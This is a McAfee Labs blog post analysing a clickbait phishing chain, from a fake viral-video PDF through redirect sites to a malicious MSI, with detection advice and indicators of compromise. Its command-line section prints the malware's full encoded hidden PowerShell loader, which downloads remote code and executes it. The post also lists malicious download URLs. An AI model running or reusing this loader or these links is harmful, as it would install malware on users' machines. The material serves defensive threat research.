The Dark Side of Clickbait: How Fake Video Links Deliver Malware | McAfee Blog
Authored By Sakshi Jaiswal
McAfee Labs recently observed a surge in phishing campaigns that use fake viral video links to trick users into downloading malware. The attack relies on social engineering, redirecting victims through multiple malicious websites before delivering the payload. Users are enticed with promises of exclusive content, ultimately leading them to fraudulent pages and deceptive download links.
Figure 1: Geo Heatmap showing McAfee customer encounters over the past 3 weeks.
Analysis
1. Upon executing the PDF file, the displayed page appears to be part of a phishing scam leveraging clickbait about a “viral video” to lure users into clicking suspicious links. The document contains blue hyperlinked text labeled as “Watch ➤ Click Here To Link (Full Viral Video Link)” and a deceptive video player graphic, giving the illusion of a playable video.
Figure 2: PDF Image
2. The user clicks on “Watch ➤ Click Here To Link (Full Viral Video Link)“, which redirects them to a webpage (gitb.org) displaying fake “viral video leaked” content, excessive ads, and fake notifications to lure users. It promotes adult content, gambling, and misleading download buttons, which are common indicators of phishing or malware traps.
Figure 3: Redirected Webpage
3. This further redirects to malicious URL “hxxps[:]//purecopperapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1737975550-34G123G137G124-AITLS2195&keyword=Yourfile&ip=115.118.240.109&sub=22697121&source=157764”
Figure 4: Redirected Webpage2
4. And then redirected to below URL: “hxxps[:]//savetitaniumapp.monster/?t=d6ebff4d554677320244f60589926b97” which presents a password-protected download link hosted on Mega.nz, requiring the user to manually copy and paste the URL.
Figure 5: Redirected Webpage with download link
5. Upon checking the URL, it displays a loading screen while preparing the malicious file for download and then shows a downloadable file named 91.78.127.175.zip with a size of 26.7 MB.
Figure 6: Screenshot of a ZIP file download from MEGA
6. Download is completed and stored in downloads folder
Figure 7: Zip file downloaded
7. A ZIP archive (91.78.127.175.zip, 26.7 MB) file contains a password protected .7z file with .png file containing the password.
Figure 8: Files inside ZIP archive
8. The extracted .7z archive contains setup.msi, which is the actual malware payload.
Figure 9: setup.msi file
Execution
Upon execution of setup.msi, the malware:
1. Displays a CAPTCHA image to deceive users. upon clicking “OK,” it begins dropping files in the %Roaming% directory.
Figure 10: Screenshot of CAPTCHA image
2. Drops files into the %Roaming% directory.
Figure 11: Dropped multiple files in %Roaming%
Process Execution & Command Lines
Process Tree
Figure 12: Process Tree
Command Lines
- C:Windowssystem32msiexec.exe /V
-
- C:Windowssyswow64MsiExec.exe -Embedding B8B3D9D8EE75B04B6E518D4C8B1DA31A
-
- “C:Users****AppDataRoamingToiap Corp SolusKowi SAppUnRar.exe” x -p156427613t -o+ “C:Users****AppDataRoamingToiap Corp SolusKowi SAppiwhgjds.rar” “C:Users****AppDataRoamingToiap Corp SolusKowi SApp”
-
-
- ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
-
- “C:Users****AppDataRoamingToiap Corp SolusKowi SAppobs-ffmpeg-mux.exe”
-
- ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
-
- C:WindowsSysWOW64explorer.exe explorer.exe
-
-
- powershell -windowstyle hidden -e JABIAEkAcQB5AGkAIAA9ACAAKAAiAG4ALwBmAFUAOQArAG4AbQAxAHMANwBJADQAZgBiAFAANABvAGoAQgAwACsASABqADkAcwBTAGUAMAB2ADcAeAA3AHQARABXAGwAWgBEAGwAOQB0AGYAeAAwAHUALwB1ADYAUABiAFgANgBkADIASQA4AGUAVAB0ADMAZQBPAE0AawBPAFgAaABsAHUAUABSADYATQBEADAALwA4AFAAdQAxAHQAYgBpAC8AZQBtAFgAagBOAFEAPQAiACkACgAkAGcATwBsAEoASgAgAD0AIAAkAEgASQBxAHkAaQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACAAIgBhACIAKQAKACQAaQByAEIAQwB6ACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABnAE8AbABKAEoAKQAgAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfACAALQBiAHgAbwByACAAMQA2ADcAfQAKACQAaABRAHMAUAA0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAHIAQgBDAHoAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACAAIgBhACIAKQAKACQAZgBvAEgAWgBLACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABoAFEAcwBQADQAKQAKACQAZABsADgARAAxACAAPQAgAFsAYgB5AHQAZQBbAF0AXQAoADEANQAyACwAIAAxADQAMwAsACAAMQAyADMALAAgADYAOAAsACAAMQAyADEAKQA7AAoAJABoAG4ATgBzAGoAIAA9ACAAMAA7AAoAJABmAFcARQBGAEoAIAA9ACAAJABmAG8ASABaAEsAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAKACQAXwAgAC0AYgB4AG8AcgAgACQAZABsADgARAAxAFsAJABoAG4ATgBzAGoAKwArAF0AOwAKAGkAZgAgACgAJABoAG4ATgBzAGoAIAAtAGcAZQAgACQAZABsADgARAAxAC4ATABlAG4AZwB0AGgAKQAgAHsACgAkAGgAbgBOAHMAagAgAD0AIAAwAAoAfQAKAH0ACgAKACQAdABzAHUANwB4AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7AAoAJABXAHcAdgBZAHUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGYAVwBFAEYASgApADsACgAkAEEAdQBDAFoASgA9ACQAdABzAHUANwB4AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABXAHcAdgBZAHUAKQA7AAoAJABaAEEAUQBvADkAIAA9ACAAJABBAHUAQwBaAEoALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAgACIAbAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIAZAAiACkALgBSAGUAcABsAGEAYwBlACgAIgBgACIAIgAsACAAIgBUACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACcAIgAsACAAIgBIACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiADsAIgAsACAAIgBGACIAKQAKACQAQQBRAGkAUwBmACAAPQAgAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABaAEEAUQBvADkAKQAKAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABBAFEAaQBTAGYAKQAgAHwAIABpAGUAeAAKAA==
-
-
-
-
- ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
-
-
-
-
- C:Windowssystem32WerFault.exe -u -p 3064 -s 316
-
- “C:Users****AppDataRoamingToiap Corp SolusKowi SAppcreatedump.exe”
-
-
- ??C:Windowssystem32conhost.exe 0xffffffff -ForceV1
-
- C:Windowssystem32svchost.exe -k wsappx -p -s AppXSvc
- C:WindowsSystem32svchost.exe -k WerSvcGroup
-
- C:Windowssystem32WerFault.exe -pss -s 432 -p 3064 -ip 3064
Detection & Coverage
McAfee intercepts and blocks this infection chain at multiple stages.
URL blocking of the fake video pages.
Figure 13: McAfee Blocking URL
Figure 14: McAfee PDF file Detection
Conclusion and Recommendations
This campaign highlights how cybercriminals exploit social engineering tactics and clickbait content to distribute malware. Users should remain cautious when encountering suspicious video links. To stay protected against phishing attacks and malware infections, McAfee recommends:
- Avoid clicking on suspicious links in emails, social media posts, or messages that promise exclusive or leaked content.
- Verify file sources before downloading by checking domain legitimacy and scanning files with McAfee security solutions.
- Enable real-time security updates to ensure endpoint protection remains updated against the latest threats.
- Utilize McAfee Web Protection to block access to known phishing and malware-hosting websites.
Indicators of Compromise (IoCs)
Sha256 Hash List
- 00001c98e08fa4d7f4924bd1c375149104bd4f1981cef604755d34ca225f2ce1
- 000e75287631a93264d11fc2b773c61992664277386f45fa19897a095e6a7c81
- 52c606609dab25cdd43f831140d7f296d89f9f979e00918f712018e8cc1b6750
- 00539e997eb6ae5f6f7cb050c3486a6dfb901b1268c13bdfeeec5b776bf81c1e
- 0047d7a61fd9279c9fba9a604ed892e4ec9d732b10c6562aab1938486a538b7d
Redirecting Websites
- hxxps[:]//gitb.org/watch-click/?=archive
- hxxps[:]//viralxgo.com/watch-full-video/
- hxxps[:]//purecopperapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1737975550-34G123G137G124-AITLS2195&keyword=Yourfile&ip=115.118.240.109&sub=22697121&source=157764
- hxxps[:]//wlanpremiumapp.monster/indexind.php?flow_id=107&aff_click_id=D-21356743-1739353595-34G134G64G208-YBUVA1634&keyword=Yourfile&ip=115.118.240.109&sub=22697095&source=157764
- hxxps[:]//savetitaniumapp.monster/?t=d6ebff4d554677320244f60589926b97
- hxxps[:]//loadpremiumapp.monster/?t=74fddba44e47538821a2796e12191868
- hxxps[:]//mega.nz/file/JG9nHAjQ#xYoJHxAy_mP1KlZC-m2P-UgPzXiHiH6XA0QQn62sseY
